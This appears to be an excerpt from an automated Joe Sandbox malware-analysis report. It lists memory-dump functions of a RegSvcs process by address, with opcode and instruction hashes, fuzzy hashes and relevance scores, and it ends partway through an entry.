                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7184357b9f1f5144643e7f76d389f0c8c2a17a5bf1c89e356bd6768867ccb9d3
                                              • Instruction ID: afd94a413c76ebddbf4bb70701789c9f26ee9243fded7ed78ff65cd5703bf185
                                              • Opcode Fuzzy Hash: 7184357b9f1f5144643e7f76d389f0c8c2a17a5bf1c89e356bd6768867ccb9d3
                                              • Instruction Fuzzy Hash: 4C615FB5B00205CFDB18DF69D858AADBBB6FF88311F108069E81AE7350DB31AD55CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B2C43 Relevance: .2, Instructions: 173COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dbac6fbf210a55750ba19f612eff401ab396a7d838fbaf2176dfbae94a641311
                                              • Instruction ID: 0c31f9ed5d6c49caa34137fb9853d3d5586ae3e18faf654f6f2fd59108181228
                                              • Opcode Fuzzy Hash: dbac6fbf210a55750ba19f612eff401ab396a7d838fbaf2176dfbae94a641311
                                              • Instruction Fuzzy Hash: F5518FB5A00301DFD749EF74D858A6ABBE6EFC8380B04C168D9098F366DF71AC459B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735E108 Relevance: .2, Instructions: 169COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6964d0788c99ec4551a2ae05f5175c7e909939d554812c5cea2851b77f020b57
                                              • Instruction ID: 17def5123a76f06911cefc2f0dc5f0e580517bf5fa36a808024c5f0700e40527
                                              • Opcode Fuzzy Hash: 6964d0788c99ec4551a2ae05f5175c7e909939d554812c5cea2851b77f020b57
                                              • Instruction Fuzzy Hash: 1C61C6B5E00259DFDB54DFA9D880A9EBBF6BF88310F14416AE919EB314D7319901CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073548F8 Relevance: .2, Instructions: 169COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 18c1e7bfe1a5e0219873957936e426ee760ade0706f3b72d836820e1d3ebadb7
                                              • Instruction ID: 825dfe9026cfa7caed38a660048524c50493f9e0c9dc244d5e2c3e4dbbab767c
                                              • Opcode Fuzzy Hash: 18c1e7bfe1a5e0219873957936e426ee760ade0706f3b72d836820e1d3ebadb7
                                              • Instruction Fuzzy Hash: 5251A0F0B24282DFEB6C9E758485E2B7BE6AB85254F144939CD0ACB745EB30C8C1C795
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073529A6 Relevance: .2, Instructions: 168COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 35ae2a9e3392e79725fc11c3a5d375842f2afd209288bb4a3c35b544e08ae8b3
                                              • Instruction ID: 6ac7bb5eb794ed3727129fb8b28f7bf74064eaf88a09af7508c4007f6c012f0c
                                              • Opcode Fuzzy Hash: 35ae2a9e3392e79725fc11c3a5d375842f2afd209288bb4a3c35b544e08ae8b3
                                              • Instruction Fuzzy Hash: FA516DF4A10206CBEB299FA5D494A6FB7B6BF88360F244529D81A9B394DF34DC41CB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B2C50 Relevance: .2, Instructions: 167COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 11fef42c2458550954742a42501d2d8b422b8be884ee0ee4f05f837ec3268188
                                              • Instruction ID: 8299da88ce666f3fe703af0eb519538dda1dfb915664507f7a631db949deae12
                                              • Opcode Fuzzy Hash: 11fef42c2458550954742a42501d2d8b422b8be884ee0ee4f05f837ec3268188
                                              • Instruction Fuzzy Hash: B6518CB5A00301DFD749EF74D858A6ABBE6EFC8380B04C568D9098B366DF71AC459B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C2138 Relevance: .2, Instructions: 166COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6ffda8fbde9c407e466931120057cf052bc4f04187bf07ae83e649fb81aa4f0c
                                              • Instruction ID: 3341c5525638c625ebce3dd73ef88d49661d73d863e6dc90f355e6ea15adb895
                                              • Opcode Fuzzy Hash: 6ffda8fbde9c407e466931120057cf052bc4f04187bf07ae83e649fb81aa4f0c
                                              • Instruction Fuzzy Hash: 64519D70B00206DFEB44EF64D895759BBA2FF88310F248269D919AF3C6DB759C41CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735E0E1 Relevance: .2, Instructions: 163COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 784a5c853c699c987e701baee8678f58a982a4c8f6fc6aa56b09f480266cf298
                                              • Instruction ID: 0d91a3cbf5cdd481b25458b839f43f7a90de6f8854b1298410a96ae84d55ad49
                                              • Opcode Fuzzy Hash: 784a5c853c699c987e701baee8678f58a982a4c8f6fc6aa56b09f480266cf298
                                              • Instruction Fuzzy Hash: 8A6116B5A04259DFDB55CFA9C88099EBBF6BF89310F14406AE819EB355D730DD02CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072BDEA3 Relevance: .2, Instructions: 159COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d78a3e512e4801150e30cc06767bdd3f9faec35dc1504643aa4143006726ac5a
                                              • Instruction ID: 0c4196715487b57a1443ff12137adc2c9cb6e7c71f97325d27c31fd260e7a846
                                              • Opcode Fuzzy Hash: d78a3e512e4801150e30cc06767bdd3f9faec35dc1504643aa4143006726ac5a
                                              • Instruction Fuzzy Hash: 4451CE746043868FDB25CF68C4809AAFBF2FF8A354B15859ED495EB352C734E805CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C1330 Relevance: .2, Instructions: 156COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 982ee6245da4de26c119eaff4ff7bb49795b71300a62dded870930df4f3088c8
                                              • Instruction ID: 98def9755513cf5e8fecd4c65e5d54269442055e5af8616f82ce95d1a749cf4d
                                              • Opcode Fuzzy Hash: 982ee6245da4de26c119eaff4ff7bb49795b71300a62dded870930df4f3088c8
                                              • Instruction Fuzzy Hash: 515102B5700245DFEB08EB38E455A6DBBB2FF85304B20429DD506CB392DB719C05CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B8AE7 Relevance: .1, Instructions: 148COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 235526f140781884a664521e77a665dce943f1810163f1b2b56e9bc4cf6bd3a4
                                              • Instruction ID: f76058dbc0789a75226efd7a908d6b0709c118e26da31627e1a148e44732f2b9
                                              • Opcode Fuzzy Hash: 235526f140781884a664521e77a665dce943f1810163f1b2b56e9bc4cf6bd3a4
                                              • Instruction Fuzzy Hash: CC51E171211341EFD31AEB74E459A6A7BA2FFC5304B048A5CD1468B651DFB4E906CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735C74A Relevance: .1, Instructions: 147COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 949fa8703aae6f9a5a2b7d80b990cb0d88cc61f34a8564095845ccb9dc0b0a61
                                              • Instruction ID: c630dd7bada54584552f5f858e3370790cd609180998cb5c93104e8f6e14f0c1
                                              • Opcode Fuzzy Hash: 949fa8703aae6f9a5a2b7d80b990cb0d88cc61f34a8564095845ccb9dc0b0a61
                                              • Instruction Fuzzy Hash: FF41C4F1314747AFF7214A348810A67BBEAAF85318F146929DD9BD7A80EB24E841C771
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0737F318 Relevance: .1, Instructions: 135COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4659837914.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7370000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9407821f48cbeb36981e3b886c5d8e973544c77737a7d91e54bcbd0ad870ab68
                                              • Instruction ID: 35ac9f04c14305eabc395d43e0602aa30848b9b7d3af1ff803d5398ce4a2b728
                                              • Opcode Fuzzy Hash: 9407821f48cbeb36981e3b886c5d8e973544c77737a7d91e54bcbd0ad870ab68
                                              • Instruction Fuzzy Hash: 0E41DFB4B142178FFB29DBB9D89583E7BF6BF89200B18456AC40DC7651EF389802CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C9EE6 Relevance: .1, Instructions: 134COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6c8eab4836ba7826d737e7ce720cd312c82fac986d36abd5ee0cdc9cef450aeb
                                              • Instruction ID: 08fdfe9ab385a61b27174f80dbb0fbd21c62c18590f21a6a32b1ba7e2abf4eff
                                              • Opcode Fuzzy Hash: 6c8eab4836ba7826d737e7ce720cd312c82fac986d36abd5ee0cdc9cef450aeb
                                              • Instruction Fuzzy Hash: C651ADB1700205DFE714DF29D894B69BBF6BF88314F218169E516AB3A1CB71AC41CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073567C0 Relevance: .1, Instructions: 127COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c1b701da10c7b164a5cd4a7703ae63c000af996640a7d70e4f0e6c3db18e16bb
                                              • Instruction ID: 07f83e791eb35ebd1a988987c593eab10ff17592b4f3aadc657c0f25e22a918e
                                              • Opcode Fuzzy Hash: c1b701da10c7b164a5cd4a7703ae63c000af996640a7d70e4f0e6c3db18e16bb
                                              • Instruction Fuzzy Hash: 964113B1700646CFEB15DB39D84196ABBB6FFC5620B498466D908CB351EB30EC02C7A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073D0048 Relevance: .1, Instructions: 121COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661790668.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73d0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fabb59ba09525728ae852e74e72925b0c9fff61f45d44cfd84107eedb892fc50
                                              • Instruction ID: 5e01249d1f46b2e9510baa0dbf8b3c98ed64adbd289f7a06519195eb216ee13c
                                              • Opcode Fuzzy Hash: fabb59ba09525728ae852e74e72925b0c9fff61f45d44cfd84107eedb892fc50
                                              • Instruction Fuzzy Hash: F741E7B731030AEBEF294E65E8447EA7BE6FF84B54F04402AF94846290E736CC91DB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B76FF Relevance: .1, Instructions: 121COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 866d3080fdb38da7271f7fcdf3a35f0e37dd8facbbf73885b8fd1b17fdb6696b
                                              • Instruction ID: d1d55a23f43e70b90e5f9fac94d5e0a7a63c6d9603d3884a666183040cb0a108
                                              • Opcode Fuzzy Hash: 866d3080fdb38da7271f7fcdf3a35f0e37dd8facbbf73885b8fd1b17fdb6696b
                                              • Instruction Fuzzy Hash: 4841A1B0220301EFD35AEB74D840B4ABFA2EFD1350F44D95DC1669BA52CFB5B9088B94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C3BF0 Relevance: .1, Instructions: 120COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1bfa2ba73c8452bd78a773733fbcd2ea0eafd04f4b12859d4e716767142fd3fd
                                              • Instruction ID: a52ebd4c4681544feadf2472e25d0890169db192edb32b9caee8fd38e78d4f90
                                              • Opcode Fuzzy Hash: 1bfa2ba73c8452bd78a773733fbcd2ea0eafd04f4b12859d4e716767142fd3fd
                                              • Instruction Fuzzy Hash: 0831E670604205DFDB09EB79C891AAE7BFAEF89300B24807EE519C7251DF319C42C792
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B8B10 Relevance: .1, Instructions: 118COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 08eabb6fce604a64e47a027369461dfeadd164f8f8eb03dec8ff8255fbed4a53
                                              • Instruction ID: e3f2d94cb8a8cf6c65b6c6092bf05112fda0eea965c2c190947e69ea9cad2133
                                              • Opcode Fuzzy Hash: 08eabb6fce604a64e47a027369461dfeadd164f8f8eb03dec8ff8255fbed4a53
                                              • Instruction Fuzzy Hash: C5417070301705EFD319AB74E459A6EBBE2FBC4304B10892CD5468BA54DFB5ED06CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07357628 Relevance: .1, Instructions: 115COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 766a38942c428ab85c9ce6190df4432a4404c2dd4be4811a965bebc017476704
                                              • Instruction ID: 5be4b48c329d76457aa2d44c2adadd2515a46c2cc2efc2f3e69232fe259b88ee
                                              • Opcode Fuzzy Hash: 766a38942c428ab85c9ce6190df4432a4404c2dd4be4811a965bebc017476704
                                              • Instruction Fuzzy Hash: 5A4188B16053159FC715DF68D8848AABBF6FF89350B1489A9E859CB341D731EC41CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C1380 Relevance: .1, Instructions: 114COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0065b3d0945d4113f04595c26c4b904bfbb0ec4017e7cd8817dda2d03fffa3bc
                                              • Instruction ID: 35e33a993286cef427b83cf41953f732e1ef625844db21e470844b7614160eb0
                                              • Opcode Fuzzy Hash: 0065b3d0945d4113f04595c26c4b904bfbb0ec4017e7cd8817dda2d03fffa3bc
                                              • Instruction Fuzzy Hash: 7341D1B5700205EFEB08EF28E455A6E7BB2FB89304F20425CD5069B392EF75AD05CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B7710 Relevance: .1, Instructions: 112COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 135731e4e2f4145055f220a68af984ee5f8d3534aa4b565e6d230efac24d9021
                                              • Instruction ID: 0f5bd606609bd40d94c68beba8482e9891466a29cfc2613af0753c6ab30b4021
                                              • Opcode Fuzzy Hash: 135731e4e2f4145055f220a68af984ee5f8d3534aa4b565e6d230efac24d9021
                                              • Instruction Fuzzy Hash: 8A41B570210701EFE359EB64D840B4ABBE2FFD1314F44D91CC2669BA51CFB5B9088B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0737E610 Relevance: .1, Instructions: 110COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4659837914.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7370000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 520f5d948577990ffc6079e36b97a0efa68196101728c53115da7a400b39e7b0
                                              • Instruction ID: 3303e54435ffe0898c9b5d3558ceb92b2823841e7502c4a59c08530642ce1f56
                                              • Opcode Fuzzy Hash: 520f5d948577990ffc6079e36b97a0efa68196101728c53115da7a400b39e7b0
                                              • Instruction Fuzzy Hash: 9D4173F1A10225CFE724DB68C4105AE7BF6AF88650B104669C54E9B754DFB8ED00CBD1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072BF920 Relevance: .1, Instructions: 109COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: df6679744baf6221581177d602356a561cf31f94cf9247c89a5990f7d498e097
                                              • Instruction ID: 3b6a00fb97e761055ad369c47cf2840bfcd279b0d5d4959391481f41691dd42e
                                              • Opcode Fuzzy Hash: df6679744baf6221581177d602356a561cf31f94cf9247c89a5990f7d498e097
                                              • Instruction Fuzzy Hash: 7C413DB5720106DFDB18DF68C9949AABBF1FF89350B1580A9E905DB362DB30ED41CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073D0003 Relevance: .1, Instructions: 103COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661790668.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73d0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 52434385c05757cffae4e9f445d9e39997ebf5e90c0023c86f0dc6b53e227b2e
                                              • Instruction ID: 93c143ce50dd2de70a49cb5f2b8156fa29a02eba844dff1061113bcabfaa10c7
                                              • Opcode Fuzzy Hash: 52434385c05757cffae4e9f445d9e39997ebf5e90c0023c86f0dc6b53e227b2e
                                              • Instruction Fuzzy Hash: 2B310BF7105386EFEB1A4E30E8147E53FB5AF42A44F094196F848865E2D3398C88CB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C37B1 Relevance: .1, Instructions: 101COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2a1819be3b00941a203136cb3767d343e8a8b904bfa87af9ee9c67e9badad23d
                                              • Instruction ID: 780bec4cb7da589d4af304bec0dded4949f6eac7491694353c32724d035befa1
                                              • Opcode Fuzzy Hash: 2a1819be3b00941a203136cb3767d343e8a8b904bfa87af9ee9c67e9badad23d
                                              • Instruction Fuzzy Hash: 1F31E775B10209CFEB49DBA8C580E9DBBB2FF88320F195558E505AB361CB71EC45CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072BFCD9 Relevance: .1, Instructions: 101COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 285cb201c17811467b2df13519119367dd98d96d183ac4627ae6b0fb52a2791f
                                              • Instruction ID: bcbe8491cf312c944b83e027c05394ff3fc79c0fcee1496ec0c4010b010ce698
                                              • Opcode Fuzzy Hash: 285cb201c17811467b2df13519119367dd98d96d183ac4627ae6b0fb52a2791f
                                              • Instruction Fuzzy Hash: A2314975B00201EFCB15DF38D8989AA7BB6EF89340B148169E906CB355DB75ED06CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C37E5 Relevance: .1, Instructions: 100COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 84feae7594470f71a03dcac955dae07258c47e9a352a207af217e807cb714cd8
                                              • Instruction ID: 58f39144b2b4554791c4fb8a7d363de57ea210be46d826680a9a90b97df9611f
                                              • Opcode Fuzzy Hash: 84feae7594470f71a03dcac955dae07258c47e9a352a207af217e807cb714cd8
                                              • Instruction Fuzzy Hash: 9331E775B10209CFEB49DBA8C980E9DBBB2FF88320F155558E505AF361CA71EC45CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073532E0 Relevance: .1, Instructions: 100COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a3358adec0bc1d6cddb9aa9add117d562ab09caf30a68b200dab633ccebeb354
                                              • Instruction ID: f2e37e747aa3838082dd11d76f9b4a137b8294b14686c16aef276748b66dff8b
                                              • Opcode Fuzzy Hash: a3358adec0bc1d6cddb9aa9add117d562ab09caf30a68b200dab633ccebeb354
                                              • Instruction Fuzzy Hash: E6319A75B10205AFDB05DF68D854ABEBFB6AF88310F14805AE909DB2A5CB70DD01DB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072BFCE8 Relevance: .1, Instructions: 96COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9f74e8053b9a23836e8817eadc9dfd36b11e98430af63d4cda5ec5118d0eeac5
                                              • Instruction ID: 1bff425a5f6c628bf97261eb97a2a4ff230ab1444f105b7239b3a6bb7f8652a5
                                              • Opcode Fuzzy Hash: 9f74e8053b9a23836e8817eadc9dfd36b11e98430af63d4cda5ec5118d0eeac5
                                              • Instruction Fuzzy Hash: 11313975B00211EFCB15DF38D8889AA7BB6EF89340B148168E906CB355DB35ED06CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735D2D8 Relevance: .1, Instructions: 92COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cf0f89f2af47caf8f47c9ae078a4acd337c177305c9ed190db0c90ed0778f0dd
                                              • Instruction ID: c932779ffbe02d08f5b7baf1fcf4cfbb62413cf86b8461c9e2a9abd3339b41c4
                                              • Opcode Fuzzy Hash: cf0f89f2af47caf8f47c9ae078a4acd337c177305c9ed190db0c90ed0778f0dd
                                              • Instruction Fuzzy Hash: 3F318DB1600309DFEB09DF24C584AAEBBF2FF84314F108569E9099B262CB71ED45CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07357619 Relevance: .1, Instructions: 90COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bb7fdbd1ebf1565d643ff626717ad190c7e9117715c550477a8c75ed10d0d198
